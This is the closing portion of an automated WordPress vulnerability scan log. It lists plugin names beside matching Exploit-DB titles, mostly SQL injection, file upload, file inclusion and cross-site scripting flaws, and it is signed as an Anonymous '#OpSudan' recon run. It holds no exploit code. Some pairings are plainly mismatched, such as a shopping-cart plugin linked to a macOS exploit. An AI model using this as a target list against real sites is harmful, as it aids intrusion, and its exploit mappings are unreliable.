4043. [I] wp-footnotes
4044. [M] EDB-ID: 31092 "WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities"
4045. [I] wp-forum
4046. [M] EDB-ID: 7738 "WordPress Plugin WP-Forum 1.7.8 - SQL Injection"
4047. [I] wp-glossary
4048. [M] EDB-ID: 18055 "WordPress Plugin Glossary - SQL Injection"
4049. [I] wp-google-drive
4050. [M] EDB-ID: 44435 "WordPress Plugin Google Drive 2.2 - Remote Code Execution"
4051. [I] wp-gpx-maps
4052. [M] EDB-ID: 19050 "WordPress Plugin wp-gpx-map 1.1.21 - Arbitrary File Upload"
4053. [I] wp-imagezoom
4054. [M] EDB-ID: 37243 "WordPress Plugin Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities"
4055. [M] EDB-ID: 37419 "WordPress Plugin Wp-ImageZoom - 'file' Remote File Disclosure"
4056. [M] EDB-ID: 38063 "WordPress Theme Wp-ImageZoom - 'id' SQL Injection"
4057. [I] wp-livephp
4058. [M] EDB-ID: 36483 "WordPress Plugin WP Live.php 1.2.1 - 's' Cross-Site Scripting"
4059. [I] wp-lytebox
4060. [I] wp-marketplace
4061. [I] wp-menu-creator
4062. [M] EDB-ID: 17689 "WordPress Plugin Menu Creator 1.1.7 - SQL Injection"
4063. [I] wp-mobile-detector
4064. [M] EDB-ID: 39891 "WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload"
4065. [I] wp-people
4066. [M] EDB-ID: 31230 "WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection"
4067. [I] wp-polls
4068. [M] EDB-ID: 10256 "WordPress Plugin WP-Polls 2.x - Incorrect Flood Filter"
4069. [I] wp-property
4070. [M] EDB-ID: 18987 "WordPress Plugin WP-Property 1.35.0 - Arbitrary File Upload"
4071. [I] wp-publication-archive
4072. [M] EDB-ID: 35263 "WordPress Plugin WP Publication Archive 2.0.1 - 'file' Information Disclosure"
4073. [I] wp-realty
4074. [M] EDB-ID: 29021 "WordPress Plugin Realty - Blind SQL Injection"
4075. [M] EDB-ID: 38808 "WordPress Plugin WP-Realty - 'listing_id' SQL Injection"
4076. [M] EDB-ID: 39109 "WordPress Plugin Relevanssi - 'category_name' SQL Injection"
4077. [I] wp-responsive-thumbnail-slider
4078. [M] EDB-ID: 45099 "WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)"
4079. [I] wp-safe-search
4080. [M] EDB-ID: 35067 "WordPress Plugin Safe Search - 'v1' Cross-Site Scripting"
4081. [I] wp-shopping-cart
4082. [M] EDB-ID: 6867 "Apple Mac OSX Software Update - Command Execution (Metasploit)"
4083. [I] wp-source-control
4084. [M] EDB-ID: 39287 "WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal"
4085. [I] wp-spamfree
4086. [M] EDB-ID: 17970 "WordPress Plugin WP-SpamFree Spam Plugin - SQL Injection"
4087. [I] wp-starsratebox
4088. [M] EDB-ID: 35634 "WordPress Plugin WP-StarsRateBox 1.1 - 'j' SQL Injection"
4089. [I] wp-stats-dashboard
4090. [I] wp-support-plus-responsive-ticket-system
4091. [M] EDB-ID: 34589 "SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalation"
4092. [I] wp-survey-and-quiz-tool
4093. [M] EDB-ID: 34974 "WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting"
4094. [I] wp-swimteam
4095. [M] EDB-ID: 37601 "WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download"
4096. [I] wp-symposium
4097. [M] EDB-ID: 17679 "WordPress Plugin Symposium 0.64 - SQL Injection"
4098. [M] EDB-ID: 35505 "WordPress Plugin Symposium 14.10 - SQL Injection"
4099. [M] EDB-ID: 35543 "WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload"
4100. [M] EDB-ID: 37822 "WordPress Plugin WP Symposium 15.1 - Blind SQL Injection"
4101. [M] EDB-ID: 37824 "WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection"
4102. [I] wp-syntax
4103. [M] EDB-ID: 9431 "Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption"
4104. [I] wp-table
4105. [M] EDB-ID: 3824 "Office^2 iPhone - '.XLS' Denial of Service"
4106. [I] wp-table-reloaded
4107. [M] EDB-ID: 38251 "WordPress Plugin WP-Table Reloaded - 'id' Cross-Site Scripting"
4108. [I] wp-twitter-feed
4109. [M] EDB-ID: 35084 "WordPress Plugin Twitter Feed - 'url' Cross-Site Scripting"
4110. [I] wp-whois
4111. [M] EDB-ID: 36488 "WordPress Plugin WHOIS 1.4.2 3 - 'domain' Cross-Site Scripting"
4112. [I] wp-with-spritz
4113. [M] EDB-ID: 44544 "WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion"
4114. [I] wpSS
4115. [M] EDB-ID: 39279 "WordPress Plugin wpSS - 'ss_handler.php' SQL Injection"
4116. [M] EDB-ID: 5486 "PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service"
4117. [I] wp_rokintroscroller
4118. [M] EDB-ID: 38767 "WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities"
4119. [I] wp_rokmicronews
4120. [M] EDB-ID: 38768 "WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities"
4121. [I] wp_roknewspager
4122. [M] EDB-ID: 38756 "WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities"
4123. [I] wp_rokstories
4124. [M] EDB-ID: 38757 "WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities"
4125. [I] wpeasystats
4126. [M] EDB-ID: 17862 "WordPress Plugin WPEasyStats 1.8 - Remote File Inclusion"
4127. [I] wpforum
4128. [M] EDB-ID: 17684 "WordPress Plugin Forum 1.7.8 - SQL Injection"
4129. [I] wpmarketplace
4130. [M] EDB-ID: 18988 "WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload"
4131. [I] wpsite-background-takeover
4132. [M] EDB-ID: 44417 "WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal"
4133. [I] wpstorecart
4134. [M] EDB-ID: 19023 "ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions"
4135. [I] wptf-image-gallery
4136. [M] EDB-ID: 37751 "WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download"
4137. [I] wptouch
4138. [M] EDB-ID: 18039 "WordPress Plugin wptouch - SQL Injection"
4139. [I] x7host-videox7-ugc-plugin
4140. [M] EDB-ID: 35257 "WordPress Plugin Videox7 UGC 2.5.3.2 - 'listid' Cross-Site Scripting"
4141. [M] EDB-ID: 35264 "WordPress Plugin Featured Content 0.0.1 - 'listid' Cross-Site Scripting"
4142. [I] xcloner-backup-and-restore
4143. [M] EDB-ID: 16246 "Joomla! Component com_xcloner-backupandrestore - Remote Command Execution"
4144. [I] xerte-online
4145. [M] EDB-ID: 38157 "WordPress Plugin Xerte Online - 'save.php' Arbitrary File Upload"
4146. [I] xml-and-csv-import-in-article-content
4147. [M] EDB-ID: 39576 "WordPress Plugin Import CSV 1.0 - Directory Traversal"
4148. [I] xorbin-analog-flash-clock
4149. [M] EDB-ID: 38608 "WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Cross-Site Scripting"
4150. [I] xorbin-digital-flash-clock
4151. [M] EDB-ID: 38621 "WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Cross-Site Scripting"
4152. [I] yolink-search
4153. [M] EDB-ID: 17757 "WordPress Plugin yolink Search 1.1.4 - SQL Injection"
4154. [I] yousaytoo-auto-publishing-plugin
4155. [M] EDB-ID: 36620 "WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Cross-Site Scripting"
4156. [I] yt-audio-streaming-audio-from-youtube
4157. [M] EDB-ID: 35394 "WordPress Plugin YT-Audio 1.7 - 'v' Cross-Site Scripting"
4158. [I] zarzadzanie_kontem
4159. [M] EDB-ID: 38050 "WordPress Plugin Zarzadzonie Kontem - 'ajaxfilemanager.php' Script Arbitrary File Upload"
4160. [I] zingiri-forum
4161. [M] EDB-ID: 38101 "WordPress Plugin Zingiri Forums - 'language' Local File Inclusion"
4162. [I] zingiri-web-shop
4163. [M] EDB-ID: 17867 "WordPress Plugin Zingiri Web Shop 2.2.0 - Remote File Inclusion"
4164. [M] EDB-ID: 37406 "WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload"
4165. [M] EDB-ID: 38046 "WordPress Plugin Zingiri Web Shop - 'path' Arbitrary File Upload"
4166. [I] zotpress
4167. [M] EDB-ID: 17778 "WordPress Plugin Zotpress 4.4 - SQL Injection"
4168. [I] Checking for Directory Listing Enabled ...
4169. [-] Date & Time: 02/05/2019 06:32:58
4170. [-] Completed in: 0:13:49
4171. #######################################################################################################################################
4172. Anonymous JTSEC #OpSudan Full Recon #67